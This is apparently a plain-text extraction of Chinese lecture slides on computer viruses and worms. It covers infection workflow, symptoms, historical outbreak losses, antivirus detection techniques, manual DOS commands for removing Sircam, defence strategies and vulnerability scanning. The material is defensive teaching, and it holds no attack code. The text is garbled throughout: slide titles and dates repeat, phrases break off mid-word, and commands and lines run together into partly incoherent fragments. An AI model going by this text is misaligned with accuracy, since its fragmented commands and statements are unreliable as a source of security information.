制）病毒传染计算机病毒的工作流程一次非授权的加载，病毒进入内存病毒引导模块被执行修改系统参数，引人传染和表现模块监视系统运行判断传染条件是否满足？判断触发条件是否满足？进行传染进行表现或破坏10/15/2022计算机病毒的工作流程一次非授权的加载，病毒进入内存病毒引导模病毒的特征依附性传染性潜伏性可触发性破坏性针对性人为性10/15/2022病毒的特征依附性10/11/2022病毒的征兆

磁盘文件数目增多系统的RAM空间变小文件的日期／时间值被改变可执行程序长度增加磁盘上出现坏簇程序加载时间比平时变长程序执行时间较平时变长硬盘读写时间明显增加硬盘启动系统失败10/15/2022病毒的征兆磁盘文件数目增多10/11/2022防病毒技术病毒概述病毒危害病毒新技术防病毒技术消毒病毒网络防病毒

10/15/2022防病毒技术10/11/2022计算机病毒的危害性

磁盘文件数目增多影响系统效率删除、破坏数据干扰正常操作阻塞网络进行反动宣传占用系统资源被后门控制10/15/2022计算机病毒的危害性磁盘文件数目增多10/11/2022最新病毒分析CIH病毒Loveletter病毒首例病毒与蠕虫相结合Sircam首例蠕虫与黑客相结合CodeRedIINimda病毒10/15/2022最新病毒分析CIH病毒10/11/2022病毒新技术和发展趋势隐藏型病毒自加密、多形态及变异病毒反向病毒邮件型病毒JAVA和ActiveX病毒智能化病毒形式多样化传播方式多样化专用病毒生成工具10/15/2022病毒新技术和发展趋势10/11/2022蠕虫10/15/2022蠕虫10/11/2022蠕虫病毒的特点蠕虫也是一种病毒，因此具有病毒的共同特征。

普通病毒需要的寄生,通过自己指令的执行，将自己的指令代码写到其他程序的体内，而被感染的文件就被称为”宿主”

病毒主要是感染文件，当然也还有像DIRII这种链接型病毒，还有引导区病毒。引导区病毒他是感染磁盘的引导区，如果是软盘被感染，这张软盘用在其他机器上后，同样也会感染其他机器，所以传播方式也是用软盘等方式。

10/15/2022蠕虫病毒的特点蠕虫也是一种病毒，因此具有病毒的共同特征。2001年红色代码大爆发10/15/20222001年红色代码大爆发10/11/2022蠕虫病毒的罪恶病毒名称持续时间造成损失莫里斯蠕虫1988年6000多台计算机停机,直接经济损失达9600万美元美丽杀手1999年3月政府部门和一些大公司紧急关闭了网络服务器,经济损失超过12亿美元爱虫病毒2000年5月至今众多用户电脑被感染，损失超过100亿美元以上红色代码2001年7月网络瘫痪，直接经济损失超过26亿美元求职信2001年12月至今大量病毒邮件堵塞服务器，损失达数百亿美元Sql蠕虫王2003年1月网络大面积瘫痪,银行自动提款机运做中断,直接经济损失超过26亿美元10/15/2022蠕虫病毒的罪恶病毒名称持续时间造成损失莫里斯蠕虫1988年6防病毒技术特征代码法校验和法行为监测法启发式扫描虚拟机技术10/15/2022防病毒技术10/11/2022特征代码法的实现步骤采集已知病毒样本，病毒如果即感染COM文件，又感染EXE文件，要两者都采样病毒采样中，抽取特征代码，应依据如下原则：抽取的代码比较特殊，不大可能与普通正常程序代码吻合。抽取的代码要有适当长度，一方面维持特征代码的唯一性，另一方面又不要有太大的空间与时间的开销在既感染COM文件又感染EXE文件的病毒样本中，要抽取两种样本共有的代码并将特征代码纳入病毒数据库打开被检测文件，在文件中搜索，检查文件中是否含有病毒数据库中的病毒特征代码。如果发现病毒特征代码，由于特征代码与病毒一一对应，便可以断定，被查文件中患有何种病毒。

10/15/2022特征代码法的实现步骤采集已知病毒样本，病毒如果即感染CO特征代码法的特点优点：检测准确、快速可识别病毒的名称误报警率低依据检测结果，可做杀毒处理缺点：不能检测未知病毒搜集已知病毒的特征代码，费用开销大在网络上效率低。10/15/2022特征代码法的特点优点：10/11/2022校验和法查病毒采用三种方式

在检测病毒工具中纳入校验和法，对被查的对象文件计算其正常状态的校验和，将校验和值写入被查文件中或检测工具中，而后进行比较。在应用程序中，放入校验和法自我检查功能，将文件正常状态的 校验和写入文件本身中，每当应用程序启动时，比较现行校验和与原校验和值。实现应用程序的自检测。将校验和检查程序常驻内存，每当应用程序开始运行时，自动比 较检查应用程序内部或别的文件中预先保存的校验和。10/15/2022校验和法查病毒采用三种方式在检测病毒工具中纳入校验和法，对校验和法的特点优点方法简单能发现未知病毒被查文件的细微变化也能发现。缺点必须预先记录正常态的校验和会误报警不能识别病毒名称不能对付隐蔽型病毒

10/15/2022校验和法的特点优点10/11/2022行为监测法占有INT13H（读写）改DOS系统为数据区的内存总量对COM、EXE文件做写入动作病毒程序与宿主程序的切换修改系统Usr/bin，sbin/修改系统命令10/15/2022行为监测法占有INT13H（读写）10/11/2022行为监测法的特点优点：可发现未知病毒可相当准确地预报未知的多数病毒缺点：可能误报警不能识别病毒名称实现时有一定难度10/15/2022行为监测法的特点优点：10/11/2022启发式扫描技术启发式是指“自我发现的能力”或“运用某种方式或方法去判定事物的知识和技能。”一个运用启发式扫描技术的病毒检测软件，实际上就是以特定方式实现的动态高度器或反编译器，通过对有关指令序列的反编译，逐步理解和确定其蕴藏的真正动机10/15/2022启发式扫描技术启发式是指“自我发现的能力”或“运用某种方式或虚拟机技术“虚拟”二字，有着两方面的含义：可发现未知病其一在于运行一定规则的描述语言的机器并不一定是一台真实地以该语言为机器代码的计算机，比如JAVA想做到跨平台兼容，那么每一种支持JAVA运行的计算机都要运行一个解释环境，这就是JAVA虚拟机；另一个含义是运行对应规则描述语言的机器并不是该描述语言的原设计机器，这种情况也称为仿真环境。10/15/2022虚拟机技术“虚拟”二字，有着两方面的含义：10/11/202虚拟机是反病毒的趋势在处理加密编码病毒过程中，虚拟机是比较理想的处理方法；在反病毒软件中引入虚拟机是由于综合分析了大多数已知病毒的共性，并基本可以认为在今后一段时间内的病毒大多会沿袭这些共性虚拟机的确可以抓住一些病毒“经常使用的手段”和“常见的特点”，并以此来怀疑一个新的病毒；目前“临床”应用的虚拟机并不是“高大全”的完整仿真环境，而是相对比较简单的、易于实现的版本。虚拟机技术仍然与传统技术相结合，并没有抛弃已知病毒的特征知识库。10/15/2022虚拟机是反病毒的趋势在处理加密编码病毒过程中，虚拟机是比较理Sircam病毒的清除手工删除的步骤如下：

在c:\windows>执行如下的命令：cd\Recycledc:\Recycled>attrib–r-hsirc32.exec:\Recycled>delsirc32.exec:\Recycled>cd..c:\>cdwindowsc:\windows>attrib-r-hscam32.exec:\windows>delscam32.exe

10/15/2022Sircam病毒的清除手工删除的步骤如下：10/11/202全方位、多层次防病毒统一安装，集中管理自动更新病毒定义库网络防病毒系统特点网络防病毒系统10/15/2022全方位、多层次防病毒网络防病毒系统特点网络防病毒系统10/1病毒防护策略

Internet总部办事处分公司分公司在全网部署病毒防护系统采用全网统一的病毒防护策略，对于网内传播的病毒进行及时的查杀，实现全网统一升级，保持病毒库版本的一致性，同时针对重点的防范点可采用防病毒网关进行防护。具体防护包括:内联网和外联网病毒防护策略操作系统病毒防护策略应用系统病毒防护策略服务器机群病毒扩护策略工作站病毒防护策略10/15/2022病毒防护策略Internet总部办事处分公司分公司在全网企业防范蠕虫病毒的策略企业防毒的一个重要方面是是管理和策略。推荐的企业防范蠕虫病毒的策略如下

1．加强网络管理员安全管理水平，提高安全意识。由于蠕虫病毒利用的是系统漏洞进行攻击，所以需要在第一时间内保持系统和应用软件的安全性,保持各种操作系统和应用软件的更新！

2．建立病毒检测系统。

能够在第一时间内检测到网络异常和病毒攻击。

3．建立应急响应系统，将风险减少到最小！

由于蠕虫病毒爆发的突然性，可能在病毒发现的时候已经蔓延到了整个网络，所以在突发情况下 ，建立一个紧急 响应系统是很有必要的，在病毒爆发的第一时间即能提供解决方案。

4．建立灾难备份系统。对于数据库和数据系统，必须采用定期备份，多机备份措施，防止意外灾难下的数据丢失！5．对于局域网而言，可以采用以下一些主要手段：

（1）在因特网接入口处安装防火墙式防杀计算机病毒产品，将病毒隔离在局域网之外。

（2）对邮件服务器进行监控，防止带毒邮件进行传播！

（3）对局域网用户进行安全培训。

（4）建立局域网内部的升级系统，包括各种操作系统的补丁升级，各种常用的应用软件升级，各种 杀毒软件病毒库的升级等等！

10/15/2022企业防范蠕虫病毒的策略企业防毒的一个重要方面是是管理和策略。个人用户的防范策略网络蠕虫病毒对个人用户的攻击主要还是通过社会工程学，而不是利用系统漏洞！所以防范此类病毒需要注意以下几点：

1．购合适的杀毒软件

网络蠕虫病毒的发展已经使传统的杀毒软件的“文件级实时监控系统”落伍，杀毒软件必须向内存实时监控和邮件实时监控发展！

2.经常升级病毒库杀毒软件对病毒的查杀是以病毒的特征码为依据的,而病毒每天都层出不穷,尤其是在网络时代,蠕虫病毒的传播速度快,变种多,所以必须随时更新病毒库,以便能够查杀最新的病毒!3．提高防杀毒意识不要轻易去点击陌生的站点，有可能里面就含有恶意代码！

当运行IE时，点击“工具→Internet选项→安全→Internet区域的安全级别”，把安全级别由“中”改为“高”。、因为这一类网页主要是含有恶意代码的ActiveX或Applet、JavaScript的网页文件，所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以大大减少被网页恶意代码感染的几率

4．不随意查看陌生邮件

尤其是带有附件的邮件，由于有的病毒邮件能够利用ie和outlook的漏洞自动执行，所以计算机用户需要升级ie和outlook程序，及常用的其他应用程序！10/15/2022个人用户的防范策略网络蠕虫病毒对个人用户的攻击主要漏洞扫描技术不断增加的新应用漏洞的发现漏洞对系统的威胁漏洞的脆弱性分析扫描技术漏洞扫描工具介绍10/15/2022漏洞扫描技术不断增加的新应用10/11/2022漏洞的发现vulnerability漏洞是硬件、软件或策略上的缺陷，从而使得攻击者能够在未授权的情况下访问、控制系统漏洞的发现黑客破译者安全服务商组织10/15/2022漏洞的发现vulnerability漏洞是硬件、软件或策略上漏洞对系统的威胁（一）7月份来自国内的攻击总数为：383+396+120+441=1340次

10/15/2022漏洞对系统的威胁（一）7月份来自国内的攻击总数为：383+3漏洞对系统的威胁（二）10/15/2022漏洞对系统的威胁（二）10/11/2022漏洞的脆弱性分析--CGI10/15/2022漏洞的脆弱性分析--CGI10/11/2022漏洞的脆弱性分析---协议用户接口用户协议接口用户数据传输服务器协议接口服务器数据传输控制连接

数据连接

FTP模型(在FTP标准[PR85]中，FTP服务器允许无限次输入密码。

“PASS”命令以明文传送密码。

10/15/2022漏洞的脆弱性分析---协议用户接口用户协议接口用户数据传扫描技术扫描程序是自动检测远端或本地主机脆弱性